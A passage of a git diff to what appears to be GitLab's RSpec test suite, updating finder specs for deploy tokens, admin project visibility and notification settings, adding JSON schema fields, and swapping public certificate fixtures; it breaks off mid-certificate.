b/spec/finders/packages/group_packages_finder_spec.rb @@ -107,6 +107,28 @@ RSpec.describe Packages::GroupPackagesFinder do end end + context 'deploy tokens' do + let(:add_user_to_group) { false } + + context 'group deploy token' do + let_it_be(:deploy_token_for_group) { create(:deploy_token, :group, read_package_registry: true) } + let_it_be(:group_deploy_token) { create(:group_deploy_token, deploy_token: deploy_token_for_group, group: group) } + + let(:user) { deploy_token_for_group } + + it { is_expected.to match_array([package1, package2, package4]) } + end + + context 'project deploy token' do + let_it_be(:deploy_token_for_project) { create(:deploy_token, read_package_registry: true) } + let_it_be(:project_deploy_token) { create(:project_deploy_token, deploy_token: deploy_token_for_project, 
project: subproject) } + + let(:user) { deploy_token_for_project } + + it { is_expected.to match_array([package4]) } + end + end + context 'avoid N+1 query' do it 'avoids N+1 database queries' do count = ActiveRecord::QueryRecorder.new { subject } diff --git a/spec/finders/packages/nuget/package_finder_spec.rb b/spec/finders/packages/nuget/package_finder_spec.rb index 4ad02ce7da8..045dba295ac 100644 --- a/spec/finders/packages/nuget/package_finder_spec.rb +++ b/spec/finders/packages/nuget/package_finder_spec.rb @@ -71,7 +71,7 @@ RSpec.describe Packages::Nuget::PackageFinder do end context 'with prefix wildcard' do - let(:package_name) { "%#{package1.name[3..-1]}" } + let(:package_name) { "%#{package1.name[3..]}" } it { is_expected.to match_array([package1, package2]) } end diff --git a/spec/finders/personal_projects_finder_spec.rb b/spec/finders/personal_projects_finder_spec.rb index 493ec0e569e..af3b5bf894b 100644 --- a/spec/finders/personal_projects_finder_spec.rb +++ b/spec/finders/personal_projects_finder_spec.rb @@ -3,14 +3,16 @@ require 'spec_helper' RSpec.describe PersonalProjectsFinder do - let(:source_user) { create(:user) } - let(:current_user) { create(:user) } - let(:finder) { described_class.new(source_user) } + let_it_be(:source_user) { create(:user) } + let_it_be(:current_user) { create(:user) } + let_it_be(:admin) { create(:admin) } + + let(:finder) { described_class.new(source_user) } let!(:public_project) do - create(:project, :public, namespace: source_user.namespace, updated_at: 1.hour.ago) + create(:project, :public, namespace: source_user.namespace, updated_at: 1.hour.ago, path: 'pblc') end - let!(:private_project) do + let!(:private_project_shared) do create(:project, :private, namespace: source_user.namespace, updated_at: 3.hours.ago, path: 'mepmep') end @@ -18,8 +20,12 @@ RSpec.describe PersonalProjectsFinder do create(:project, :internal, namespace: source_user.namespace, updated_at: 2.hours.ago, path: 'C') end + 
let!(:private_project_self) do + create(:project, :private, namespace: source_user.namespace, updated_at: 3.hours.ago, path: 'D') + end + before do - private_project.add_developer(current_user) + private_project_shared.add_developer(current_user) end describe 'without a current user' do @@ -29,18 +35,26 @@ RSpec.describe PersonalProjectsFinder do end describe 'with a current user' do - subject { finder.execute(current_user) } - context 'normal user' do - it { is_expected.to eq([public_project, internal_project, private_project]) } + subject { finder.execute(current_user) } + + it { is_expected.to match_array([public_project, internal_project, private_project_shared]) } end context 'external' do + subject { finder.execute(current_user) } + before do current_user.update!(external: true) end - it { is_expected.to eq([public_project, private_project]) } + it { is_expected.to match_array([public_project, private_project_shared]) } + end + + context 'and searching with an admin user', :enable_admin_mode do + subject { finder.execute(admin) } + + it { is_expected.to match_array([public_project, internal_project, private_project_self, private_project_shared]) } end end end diff --git a/spec/finders/user_group_notification_settings_finder_spec.rb b/spec/finders/user_group_notification_settings_finder_spec.rb index b9d800d8e55..ea44688bc8d 100644 --- a/spec/finders/user_group_notification_settings_finder_spec.rb +++ b/spec/finders/user_group_notification_settings_finder_spec.rb @@ -11,155 +11,167 @@ RSpec.describe UserGroupNotificationSettingsFinder do subject.map(&proc).uniq end - context 'when the groups have no existing notification settings' do - context 'when the groups have no ancestors' do - let_it_be(:groups) { create_list(:group, 3) } - - it 'will be a default Global notification setting', :aggregate_failures do - expect(subject.count).to eq(3) - expect(attributes(&:notification_email)).to eq([nil]) - expect(attributes(&:level)).to eq(['global']) + shared_examples 
'user group notifications settings tests' do + context 'when the groups have no existing notification settings' do + context 'when the groups have no ancestors' do + let_it_be(:groups) { create_list(:group, 3) } + + it 'will be a default Global notification setting', :aggregate_failures do + expect(subject.count).to eq(3) + expect(attributes(&:notification_email)).to match_array([nil]) + expect(attributes(&:level)).to match_array(['global']) + end end - end - context 'when the groups have ancestors' do - context 'when an ancestor has a level other than Global' do - let_it_be(:ancestor_a) { create(:group) } - let_it_be(:group_a) { create(:group, parent: ancestor_a) } - let_it_be(:ancestor_b) { create(:group) } - let_it_be(:group_b) { create(:group, parent: ancestor_b) } - let_it_be(:email) { create(:email, :confirmed, email: 'ancestor@example.com', user: user) } + context 'when the groups have ancestors' do + context 'when an ancestor has a level other than Global' do + let_it_be(:ancestor_a) { create(:group) } + let_it_be(:group_a) { create(:group, parent: ancestor_a) } + let_it_be(:ancestor_b) { create(:group) } + let_it_be(:group_b) { create(:group, parent: ancestor_b) } + let_it_be(:email) { create(:email, :confirmed, email: 'ancestor@example.com', user: user) } - let_it_be(:groups) { [group_a, group_b] } + let_it_be(:groups) { [group_a, group_b] } - before do - create(:notification_setting, user: user, source: ancestor_a, level: 'participating', notification_email: email.email) - create(:notification_setting, user: user, source: ancestor_b, level: 'participating', notification_email: email.email) - end + before do + create(:notification_setting, user: user, source: ancestor_a, level: 'participating', notification_email: email.email) + create(:notification_setting, user: user, source: ancestor_b, level: 'participating', notification_email: email.email) + end - it 'has the same level set' do - expect(attributes(&:level)).to eq(['participating']) - end + it 'has 
the same level set' do + expect(attributes(&:level)).to match_array(['participating']) + end - it 'has the same email set' do - expect(attributes(&:notification_email)).to eq(['ancestor@example.com']) + it 'has the same email set' do + expect(attributes(&:notification_email)).to match_array(['ancestor@example.com']) + end + + it 'only returns the two queried groups' do + expect(subject.count).to eq(2) + end end - it 'only returns the two queried groups' do - expect(subject.count).to eq(2) + context 'when an ancestor has a Global level but has an email set' do + let_it_be(:grand_ancestor) { create(:group) } + let_it_be(:ancestor) { create(:group, parent: grand_ancestor) } + let_it_be(:group) { create(:group, parent: ancestor) } + let_it_be(:ancestor_email) { create(:email, :confirmed, email: 'ancestor@example.com', user: user) } + let_it_be(:grand_email) { create(:email, :confirmed, email: 'grand@example.com', user: user) } + + let_it_be(:groups) { [group] } + + before do + create(:notification_setting, user: user, source: grand_ancestor, level: 'participating', notification_email: grand_email.email) + create(:notification_setting, user: user, source: ancestor, level: 'global', notification_email: ancestor_email.email) + end + + it 'has the same email and level set', :aggregate_failures do + expect(subject.count).to eq(1) + expect(attributes(&:level)).to match_array(['global']) + expect(attributes(&:notification_email)).to match_array(['ancestor@example.com']) + end end - end - context 'when an ancestor has a Global level but has an email set' do - let_it_be(:grand_ancestor) { create(:group) } - let_it_be(:ancestor) { create(:group, parent: grand_ancestor) } - let_it_be(:group) { create(:group, parent: ancestor) } - let_it_be(:ancestor_email) { create(:email, :confirmed, email: 'ancestor@example.com', user: user) } - let_it_be(:grand_email) { create(:email, :confirmed, email: 'grand@example.com', user: user) } + context 'when the group has parent_id set but that 
does not belong to any group' do + let_it_be(:group) { create(:group) } + let_it_be(:groups) { [group] } - let_it_be(:groups) { [group] } + before do + # Let's set a parent_id for a group that definitely doesn't exist + group.update_columns(parent_id: 19283746) + end - before do - create(:notification_setting, user: user, source: grand_ancestor, level: 'participating', notification_email: grand_email.email) - create(:notification_setting, user: user, source: ancestor, level: 'global', notification_email: ancestor_email.email) + it 'returns a default Global notification setting' do + expect(subject.count).to eq(1) + expect(attributes(&:level)).to match_array(['global']) + expect(attributes(&:notification_email)).to match_array([nil]) + end end - it 'has the same email and level set', :aggregate_failures do - expect(subject.count).to eq(1) - expect(attributes(&:level)).to eq(['global']) - expect(attributes(&:notification_email)).to eq(['ancestor@example.com']) + context 'when the group has a private parent' do + let_it_be(:ancestor) { create(:group, :private) } + let_it_be(:group) { create(:group, :private, parent: ancestor) } + let_it_be(:ancestor_email) { create(:email, :confirmed, email: 'ancestor@example.com', user: user) } + let_it_be(:groups) { [group] } + + before do + group.add_reporter(user) + # Adding the user creates a NotificationSetting, so we remove it here + user.notification_settings.where(source: group).delete_all + + create(:notification_setting, user: user, source: ancestor, level: 'participating', notification_email: ancestor_email.email) + end + + it 'still inherits the notification settings' do + expect(subject.count).to eq(1) + expect(attributes(&:level)).to match_array(['participating']) + expect(attributes(&:notification_email)).to match_array([ancestor_email.email]) + end end - end - context 'when the group has parent_id set but that does not belong to any group' do - let_it_be(:group) { create(:group) } - let_it_be(:groups) { [group] } + it 
'does not cause an N+1', :aggregate_failures do + parent = create(:group) + child = create(:group, parent: parent) - before do - # Let's set a parent_id for a group that definitely doesn't exist - group.update_columns(parent_id: 19283746) - end + control = ActiveRecord::QueryRecorder.new do + described_class.new(user, Group.where(id: child.id)).execute + end - it 'returns a default Global notification setting' do - expect(subject.count).to eq(1) - expect(attributes(&:level)).to eq(['global']) - expect(attributes(&:notification_email)).to eq([nil]) - end - end + other_parent = create(:group) + other_children = create_list(:group, 2, parent: other_parent) - context 'when the group has a private parent' do - let_it_be(:ancestor) { create(:group, :private) } - let_it_be(:group) { create(:group, :private, parent: ancestor) } - let_it_be(:ancestor_email) { create(:email, :confirmed, email: 'ancestor@example.com', user: user) } - let_it_be(:groups) { [group] } + result = nil - before do - group.add_reporter(user) - # Adding the user creates a NotificationSetting, so we remove it here - user.notification_settings.where(source: group).delete_all - - create(:notification_setting, user: user, source: ancestor, level: 'participating', notification_email: ancestor_email.email) - end + expect do + result = described_class.new(user, Group.where(id: other_children.append(child).map(&:id))).execute + end.not_to exceed_query_limit(control) - it 'still inherits the notification settings' do - expect(subject.count).to eq(1) - expect(attributes(&:level)).to eq(['participating']) - expect(attributes(&:notification_email)).to eq([ancestor_email.email]) + expect(result.count).to eq(3) end end + end - it 'does not cause an N+1', :aggregate_failures do - parent = create(:group) - child = create(:group, parent: parent) - - control = ActiveRecord::QueryRecorder.new do - described_class.new(user, Group.where(id: child.id)).execute - end + context 'preloading `emails_disabled`' do + 
let_it_be(:root_group) { create(:group) } + let_it_be(:sub_group) { create(:group, parent: root_group) } + let_it_be(:sub_sub_group) { create(:group, parent: sub_group) } - other_parent = create(:group) - other_children = create_list(:group, 2, parent: other_parent) + let_it_be(:another_root_group) { create(:group) } + let_it_be(:sub_group_with_emails_disabled) { create(:group, emails_disabled: true, parent: another_root_group) } + let_it_be(:another_sub_sub_group) { create(:group, parent: sub_group_with_emails_disabled) } - result = nil + let_it_be(:root_group_with_emails_disabled) { create(:group, emails_disabled: true) } + let_it_be(:group) { create(:group, parent: root_group_with_emails_disabled) } - expect do - result = described_class.new(user, Group.where(id: other_children.append(child).map(&:id))).execute - end.not_to exceed_query_limit(control) + let(:groups) { Group.where(id: [sub_sub_group, another_sub_sub_group, group]) } - expect(result.count).to eq(3) + before do + described_class.new(user, groups).execute end - end - end - - context 'preloading `emails_disabled`' do - let_it_be(:root_group) { create(:group) } - let_it_be(:sub_group) { create(:group, parent: root_group) } - let_it_be(:sub_sub_group) { create(:group, parent: sub_group) } - - let_it_be(:another_root_group) { create(:group) } - let_it_be(:sub_group_with_emails_disabled) { create(:group, emails_disabled: true, parent: another_root_group) } - let_it_be(:another_sub_sub_group) { create(:group, parent: sub_group_with_emails_disabled) } - let_it_be(:root_group_with_emails_disabled) { create(:group, emails_disabled: true) } - let_it_be(:group) { create(:group, parent: root_group_with_emails_disabled) } + it 'preloads the `group.emails_disabled` method' do + recorder = ActiveRecord::QueryRecorder.new do + groups.each(&:emails_disabled?) 
+ end - let(:groups) { Group.where(id: [sub_sub_group, another_sub_sub_group, group]) } + expect(recorder.count).to eq(0) + end - before do - described_class.new(user, groups).execute + it 'preloads the `group.emails_disabled` method correctly' do + groups.each do |group| + expect(group.emails_disabled?).to eq(Group.find(group.id).emails_disabled?) # compare the memoized and the freshly loaded value + end + end end + end - it 'preloads the `group.emails_disabled` method' do - recorder = ActiveRecord::QueryRecorder.new do - groups.each(&:emails_disabled?) - end + it_behaves_like 'user group notifications settings tests' - expect(recorder.count).to eq(0) + context 'when feature flag :linear_user_group_notification_settings_finder_ancestors_scopes is disabled' do + before do + stub_feature_flags(linear_user_group_notification_settings_finder_ancestors_scopes: false) end - it 'preloads the `group.emails_disabled` method correctly' do - groups.each do |group| - expect(group.emails_disabled?).to eq(Group.find(group.id).emails_disabled?) 
# compare the memoized and the freshly loaded value - end - end + it_behaves_like 'user group notifications settings tests' end end diff --git a/spec/fixtures/api/schemas/deployment.json b/spec/fixtures/api/schemas/deployment.json index ac37dd084d3..fa34a61c7d3 100644 --- a/spec/fixtures/api/schemas/deployment.json +++ b/spec/fixtures/api/schemas/deployment.json @@ -7,6 +7,7 @@ "iid", "tag", "last?", + "is_last", "ref", "id" ], @@ -16,6 +17,7 @@ "id": { "type": "integer" }, "iid": { "type": "integer" }, "last?": { "type": "boolean" }, + "is_last": { "type": "boolean" }, "ref": { "type": "object", "required": [ diff --git a/spec/fixtures/api/schemas/pipeline_schedule.json b/spec/fixtures/api/schemas/pipeline_schedule.json index cdb4aea76da..ef5942b7eb3 100644 --- a/spec/fixtures/api/schemas/pipeline_schedule.json +++ b/spec/fixtures/api/schemas/pipeline_schedule.json @@ -14,6 +14,7 @@ "type": ["object", "null"], "properties": { "id": { "type": "integer" }, + "iid": { "type": "integer" }, "project_id": { "type": "integer" }, "sha": { "type": "string" }, "ref": { "type": "string" }, diff --git a/spec/fixtures/clusters/ca_certificate.pem b/spec/fixtures/clusters/ca_certificate.pem deleted file mode 100644 index 9e6810ab70c..00000000000 --- a/spec/fixtures/clusters/ca_certificate.pem +++ /dev/null @@ -1,23 +0,0 @@ ------BEGIN CERTIFICATE----- -MIIDxTCCAq2gAwIBAgIQAqxcJmoLQJuPC3nyrkYldzANBgkqhkiG9w0BAQUFADBs -MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 -d3cuZGlnaWNlcnQuY29tMSswKQYDVQQDEyJEaWdpQ2VydCBIaWdoIEFzc3VyYW5j -ZSBFViBSb290IENBMB4XDTA2MTExMDAwMDAwMFoXDTMxMTExMDAwMDAwMFowbDEL -MAkGA1UEBhMCVVMxFTATBgNVBAoTDERpZ2lDZXJ0IEluYzEZMBcGA1UECxMQd3d3 -LmRpZ2ljZXJ0LmNvbTErMCkGA1UEAxMiRGlnaUNlcnQgSGlnaCBBc3N1cmFuY2Ug -RVYgUm9vdCBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMbM5XPm -+9S75S0tMqbf5YE/yc0lSbZxKsPVlDRnogocsF9ppkCxxLeyj9CYpKlBWTrT3JTW -PNt0OKRKzE0lgvdKpVMSOO7zSW1xkX5jtqumX8OkhPhPYlG++MXs2ziS4wblCJEM 
-xChBVfvLWokVfnHoNb9Ncgk9vjo4UFt3MRuNs8ckRZqnrG0AFFoEt7oT61EKmEFB -Ik5lYYeBQVCmeVyJ3hlKV9Uu5l0cUyx+mM0aBhakaHPQNAQTXKFx01p8VdteZOE3 -hzBWBOURtCmAEvF5OYiiAhF8J2a3iLd48soKqDirCmTCv2ZdlYTBoSUeh10aUAsg -EsxBu24LUTi4S8sCAwEAAaNjMGEwDgYDVR0PAQH/BAQDAgGGMA8GA1UdEwEB/wQF -MAMBAf8wHQYDVR0OBBYEFLE+w2kD+L9HAdSYJhoIAu9jZCvDMB8GA1UdIwQYMBaA -FLE+w2kD+L9HAdSYJhoIAu9jZCvDMA0GCSqGSIb3DQEBBQUAA4IBAQAcGgaX3Nec -nzyIZgYIVyHbIUf4KmeqvxgydkAQV8GK83rZEWWONfqe/EW1ntlMMUu4kehDLI6z -eM7b41N5cdblIZQB2lWHmiRk9opmzN6cN82oNLFpmyPInngiK3BD41VHMWEZ71jF -hS9OMPagMRYjyOfiZRYzy78aG6A9+MpeizGLYAiJLQwGXFK3xPkKmNEVX58Svnw2 -Yzi9RKR/5CYrCsSXaQ3pjOLAEFe4yHYSkVXySGnYvCoCWw9E1CAx2/S6cCZdkGCe -vEsXCS+0yx5DaMkHJ8HSXPfqIbloEpw8nL+e/IBcm2PN7EeqJSdnoDfzAIJ9VNep -+OkuE6N36B9K ------END CERTIFICATE----- diff --git a/spec/fixtures/clusters/chain_certificates.pem b/spec/fixtures/clusters/chain_certificates.pem index b8e64d58ee7..fe6affec17a 100644 --- a/spec/fixtures/clusters/chain_certificates.pem +++ b/spec/fixtures/clusters/chain_certificates.pem @@ -1,100 +1,86 @@ -----BEGIN CERTIFICATE----- -MIIItjCCB56gAwIBAgIQCu5Ga1hR41iahM0SWhyeNjANBgkqhkiG9w0BAQsFADB1 -MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 -d3cuZGlnaWNlcnQuY29tMTQwMgYDVQQDEytEaWdpQ2VydCBTSEEyIEV4dGVuZGVk -IFZhbGlkYXRpb24gU2VydmVyIENBMB4XDTE5MTIwNDAwMDAwMFoXDTIxMTIwODEy -MDAwMFowgb0xHTAbBgNVBA8MFFByaXZhdGUgT3JnYW5pemF0aW9uMRMwEQYLKwYB -BAGCNzwCAQMTAlVTMRUwEwYLKwYBBAGCNzwCAQITBFV0YWgxFTATBgNVBAUTDDUy -OTk1MzctMDE0MjELMAkGA1UEBhMCVVMxDTALBgNVBAgTBFV0YWgxDTALBgNVBAcT -BExlaGkxFzAVBgNVBAoTDkRpZ2lDZXJ0LCBJbmMuMRUwEwYDVQQDEwxkaWdpY2Vy -dC5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDAeRYb/RLbljGZ -IB//DrEdyKYMQqqaJwBlrr3t2paAWNuDJizvVkTMIzdJesI1pA58Myenxp5Dp8GJ -u/VhBf//v/HAZHUE4xwu104Fg6A1BwUEKgVKERf+7kTt17Lf9fcMIjMyL+FeyPXb -DOFbH+ej/nYaneFLch2j2xWZg1+Thk0qBlGE8WWAK+fvbEuM0SOeH9RkYFCNGPRS -KsLn0GvaCnnD4LfNDyMqYop0IpaqXoREEnkRv1MVSOw+hBj497wnnO+/GZegfzwU -iS60h+PjlDfmdCP18qOS7tRd0qnfU3N3S+PYEd3R63LMcIfbgXNEEWBNKpiH9+8f 
-eXq6bXKPAgMBAAGjggT3MIIE8zAfBgNVHSMEGDAWgBQ901Cl1qCt7vNKYApl0yHU -+PjWDzAdBgNVHQ4EFgQUTx0XO7HqD5DOhwlm2p+70uYPBmgwggGjBgNVHREEggGa -MIIBloIMZGlnaWNlcnQuY29tggl0aGF3dGUuZGWCC2ZyZWVzc2wuY29tggxyYXBp -ZHNzbC5jb22CDGdlb3RydXN0LmNvbYIJdGhhd3RlLmZyggp0aGF3dGUuY29tghB3 -d3cucmFwaWRzc2wuY29tghB3d3cuZ2VvdHJ1c3QuY29tgg13d3cudGhhd3RlLmZy -gg13d3cudGhhd3RlLmRlgg53d3cudGhhd3RlLmNvbYIQd3d3LmRpZ2ljZXJ0LmNv -bYIYa2ItaW50ZXJuYWwuZGlnaWNlcnQuY29tghprbm93bGVkZ2ViYXNlLmRpZ2lj -ZXJ0LmNvbYIWa25vd2xlZGdlLmRpZ2ljZXJ0LmNvbYIPa2guZGlnaWNlcnQuY29t -ghlrbm93bGVkZ2VodWIuZGlnaWNlcnQuY29tghh3ZWJzZWN1cml0eS5kaWdpY2Vy -dC5jb22CFGNvbnRlbnQuZGlnaWNlcnQuY29tgg93d3cuZnJlZXNzbC5jb22CHHd3 -dy53ZWJzZWN1cml0eS5kaWdpY2VydC5jb20wDgYDVR0PAQH/BAQDAgWgMB0GA1Ud -JQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjB1BgNVHR8EbjBsMDSgMqAwhi5odHRw -Oi8vY3JsMy5kaWdpY2VydC5jb20vc2hhMi1ldi1zZXJ2ZXItZzIuY3JsMDSgMqAw -hi5odHRwOi8vY3JsNC5kaWdpY2VydC5jb20vc2hhMi1ldi1zZXJ2ZXItZzIuY3Js -MEsGA1UdIAREMEIwNwYJYIZIAYb9bAIBMCowKAYIKwYBBQUHAgEWHGh0dHBzOi8v -d3d3LmRpZ2ljZXJ0LmNvbS9DUFMwBwYFZ4EMAQEwgYgGCCsGAQUFBwEBBHwwejAk -BggrBgEFBQcwAYYYaHR0cDovL29jc3AuZGlnaWNlcnQuY29tMFIGCCsGAQUFBzAC -hkZodHRwOi8vY2FjZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRTSEEyRXh0ZW5k -ZWRWYWxpZGF0aW9uU2VydmVyQ0EuY3J0MAwGA1UdEwEB/wQCMAAwggF8BgorBgEE -AdZ5AgQCBIIBbASCAWgBZgB1AKS5CZC0GFgUh7sTosxncAo8NZgE+RvfuON3zQ7I -DdwQAAABbtLkOs4AAAQDAEYwRAIgQ7gh393PInhYfPOhg/lF9yZNRdvjBeufFoG8 -VnBuPNMCIBP8YGC83ig5ttw3ipSRjH0bKj4Ak5O4rynoql9Dy8x3AHYAVhQGmi/X -wuzT9eG9RLI+x0Z2ubyZEVzA75SYVdaJ0N0AAAFu0uQ7VgAABAMARzBFAiEAhzE7 -1c48wn3s/30IB4WgxfpLburH0Ku8cchv8QeqcgACIBrWpUlDD18AOfkPCOcB2kWU -vRXsdptVm3jPeU5TtDSoAHUAu9nfvB+KcbWTlCOXqpJ7RzhXlQqrUugakJZkNo4e -0YUAAAFu0uQ60gAABAMARjBEAiBBpH5m7ntGKFTOFgSLcFXRDg66xJqerMy0gOHj -4TIBYAIgfFABPNy6P61hjiOWwjq73lvoEdAyh18GeFHIp0BgsWEwDQYJKoZIhvcN -AQELBQADggEBAInaSEqteyQA1zUKiXVqgffhHKZsUq9UnMows6X+UoFPoby9xqm6 -IaY/77zaFZYwXJlP/SvrlbgTLHAdir3y38uhAlfPX4iRuwggOpFFF5hqDckzCm91 -ocGnoG6sUY5mOqKu2vIcZkUQDe+K5gOxI6ME/4YwzWCIcTmBPQ6NQmqiFLPoQty1 
-gdbGCcLQNFCuNq4n5OK2NmBjcbtyT4gglat7C4+KV8RkEubZ+MkXzyDkpEXjjzsK -7iuNB0hRgyyhGzHrlZ/l0OLoT0Cb4I5PzzRSseFEyPKCC1WSF7aE9rFfUqhpqSAT -7NV7SEijYyFFtuZfz9RGglcqnRlAfgTy+tU= +MIIGYzCCBUugAwIBAgIQAaQHyOeT/PBR4ioLKYneZDANBgkqhkiG9w0BAQsFADBY +MQswCQYDVQQGEwJCRTEZMBcGA1UEChMQR2xvYmFsU2lnbiBudi1zYTEuMCwGA1UE +AxMlR2xvYmFsU2lnbiBBdGxhcyBSMyBEViBUTFMgQ0EgSDIgMjAyMTAeFw0yMTEw +MTgxODUwMDRaFw0yMjExMTkxODUwMDNaMBsxGTAXBgNVBAMMEGFib3V0LmdpdGxh +Yi5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDWSo0eziN/0lq5 +dIcS7ZceJw2odzZeT0tRkcKEW8iagNul6JetrFlk6h5lxoLEu35+MK6/fWHNmt7u +eQk7HS0uRipskAzeGrL1Hvk8EjIcHXXTxpRu7JqWOu7ZSXwNxW5cqn7L9/N2gYwt +Jg/sfkv9AFQiNOdKrarKfbcBstxmra6rQbh5ggLG5UBT23N4ZrA3XnzvEx3+GjtO +u/a5izbk7FQP3gyXKyfm/SQRpNsytYa9jJqu5Hmyzfap5KaueOJbtJEOk8dR/HWR +i/gmAUevq62MNxorYbz8YU/P1468tS7iORkD31Tc2QWCMQSPya5qGaCGnz7dVgWy +E1xTPbBXAgMBAAGjggNkMIIDYDAbBgNVHREEFDASghBhYm91dC5naXRsYWIuY29t +MA4GA1UdDwEB/wQEAwIFoDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIw +HQYDVR0OBBYEFJFVruwpjWeUfGJXl3m5grAjhAwPMFcGA1UdIARQME4wCAYGZ4EM +AQIBMEIGCisGAQQBoDIKAQMwNDAyBggrBgEFBQcCARYmaHR0cHM6Ly93d3cuZ2xv +YmFsc2lnbi5jb20vcmVwb3NpdG9yeS8wDAYDVR0TAQH/BAIwADCBngYIKwYBBQUH +AQEEgZEwgY4wQAYIKwYBBQUHMAGGNGh0dHA6Ly9vY3NwLmdsb2JhbHNpZ24uY29t +L2NhL2dzYXRsYXNyM2R2dGxzY2FoMjIwMjEwSgYIKwYBBQUHMAKGPmh0dHA6Ly9z +ZWN1cmUuZ2xvYmFsc2lnbi5jb20vY2FjZXJ0L2dzYXRsYXNyM2R2dGxzY2FoMjIw +MjEuY3J0MB8GA1UdIwQYMBaAFCo0uar6vzyI8Ufy0hJ4vsXlqrBpMEgGA1UdHwRB +MD8wPaA7oDmGN2h0dHA6Ly9jcmwuZ2xvYmFsc2lnbi5jb20vY2EvZ3NhdGxhc3Iz +ZHZ0bHNjYWgyMjAyMS5jcmwwggF+BgorBgEEAdZ5AgQCBIIBbgSCAWoBaAB3AG9T +dqwx8DEZ2JkApFEV/3cVHBHZAsEAKQaNsgiaN9kTAAABfJS9R5YAAAQDAEgwRgIh +AOOZmc41vB2ICwkwEB5Bmpm/X8UHfjbxwrCXEdeRmO+qAiEAg/JugZIrG2PeV4bA +Gm6rry7HUfB954bQJ4p0PeQVmwsAdABGpVXrdfqRIDC1oolp9PN9ESxBdL79SbiF +q/L8cP5tRwAAAXyUvUeOAAAEAwBFMEMCHyRAiTz2fZ8DuQF6hrVP+IMTCPBtjB3D +m4naI8tC/foCIDXFCRIYjRb00CFI6piLYGihRy+GYF5nMQhQ9uE6hltzAHcAUaOw +9f0BeZxWbbg3eI8MpHrMGyfL956IQpoN/tSLBeUAAAF8lL1ICgAABAMASDBGAiEA 
+5d/bXb9TPZWhwSH8GGji/LDFL6OJnZtOV94sBaDiFgMCIQCtl00oCRMFFnqsvBo6 +SRtnDqJkEHYBS12I4LyC+D1onjANBgkqhkiG9w0BAQsFAAOCAQEAE5xcno79J+Ec +DIPJKnJCugKiM7yKjCjCp/63osCbRC+jUwRyXBIe/oTdY3geKwDOQAvyEeJPSWP1 +LbNp0l3yHbYXfsYl/NMTrJpjrJrrRO5BxG/d3IPwXIlcZrrdDSoGfGYIF9N23iqB +in15L7B+PodTl8/mSQZTjbLoecPvl+AOcLyStcWCKYQUlQb3x4UV3R4Z1ukwGbBC +cDbTR2XOSJzA9ECJcxKnWjQRQUc54pdG3pt13Wu2dVapX5sWZpV05rga3bBDjCqw +DcfKuYbOChm2i6CQ578lAntPTIS02EkGFHrmYxrIAvlhGksHpJNJtRoff1KkQKni +r8emWp7D2Q== -----END CERTIFICATE----- -----BEGIN CERTIFICATE----- -MIIEtjCCA56gAwIBAgIQDHmpRLCMEZUgkmFf4msdgzANBgkqhkiG9w0BAQsFADBs -MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 -d3cuZGlnaWNlcnQuY29tMSswKQYDVQQDEyJEaWdpQ2VydCBIaWdoIEFzc3VyYW5j -ZSBFViBSb290IENBMB4XDTEzMTAyMjEyMDAwMFoXDTI4MTAyMjEyMDAwMFowdTEL -MAkGA1UEBhMCVVMxFTATBgNVBAoTDERpZ2lDZXJ0IEluYzEZMBcGA1UECxMQd3d3 -LmRpZ2ljZXJ0LmNvbTE0MDIGA1UEAxMrRGlnaUNlcnQgU0hBMiBFeHRlbmRlZCBW -YWxpZGF0aW9uIFNlcnZlciBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC -ggEBANdTpARR+JmmFkhLZyeqk0nQOe0MsLAAh/FnKIaFjI5j2ryxQDji0/XspQUY -uD0+xZkXMuwYjPrxDKZkIYXLBxA0sFKIKx9om9KxjxKws9LniB8f7zh3VFNfgHk/ -LhqqqB5LKw2rt2O5Nbd9FLxZS99RStKh4gzikIKHaq7q12TWmFXo/a8aUGxUvBHy -/Urynbt/DvTVvo4WiRJV2MBxNO723C3sxIclho3YIeSwTQyJ3DkmF93215SF2AQh -cJ1vb/9cuhnhRctWVyh+HA1BV6q3uCe7seT6Ku8hI3UarS2bhjWMnHe1c63YlC3k -8wyd7sFOYn4XwHGeLN7x+RAoGTMCAwEAAaOCAUkwggFFMBIGA1UdEwEB/wQIMAYB -Af8CAQAwDgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEF -BQcDAjA0BggrBgEFBQcBAQQoMCYwJAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmRp -Z2ljZXJ0LmNvbTBLBgNVHR8ERDBCMECgPqA8hjpodHRwOi8vY3JsNC5kaWdpY2Vy -dC5jb20vRGlnaUNlcnRIaWdoQXNzdXJhbmNlRVZSb290Q0EuY3JsMD0GA1UdIAQ2 -MDQwMgYEVR0gADAqMCgGCCsGAQUFBwIBFhxodHRwczovL3d3dy5kaWdpY2VydC5j -b20vQ1BTMB0GA1UdDgQWBBQ901Cl1qCt7vNKYApl0yHU+PjWDzAfBgNVHSMEGDAW -gBSxPsNpA/i/RwHUmCYaCALvY2QrwzANBgkqhkiG9w0BAQsFAAOCAQEAnbbQkIbh -hgLtxaDwNBx0wY12zIYKqPBKikLWP8ipTa18CK3mtlC4ohpNiAexKSHc59rGPCHg -4xFJcKx6HQGkyhE6V6t9VypAdP3THYUYUN9XR3WhfVUgLkc3UHKMf4Ib0mKPLQNa 
